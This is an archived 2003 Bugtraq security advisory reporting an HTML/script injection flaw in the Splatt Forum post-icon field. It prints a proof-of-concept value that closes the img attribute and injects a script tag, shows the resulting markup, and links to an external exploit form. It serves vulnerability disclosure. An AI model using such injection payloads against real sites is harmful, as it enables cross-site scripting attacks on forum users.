[30754] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Splatt Forum html injection code in post icon

daemon@ATHENA.MIT.EDU (Lethalman)
Tue Jul 15 17:09:20 2003

Date: 15 Jul 2003 15:53:40 -0000
Message-ID: <20030715155340.16133.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Lethalman <lethalman@libero.it>
To: bugtraq@securityfocus.com

Any user can inject html code when create a new post.
The bug are in the post icon:
&lt;img src="icon.gif" etc.&gt;
If you create a personalized form with this code:
icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="
the final code of the post icon is:
&lt;img
src="icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="" etc.&gt;

The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html

by Lethal Lab (Lethalman)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[30754] in bugtraq

Splatt Forum html injection code in post icon

daemon@ATHENA.MIT.EDU (Lethalman)Tue Jul 15 17:09:20 2003

daemon@ATHENA.MIT.EDU (Lethalman)
Tue Jul 15 17:09:20 2003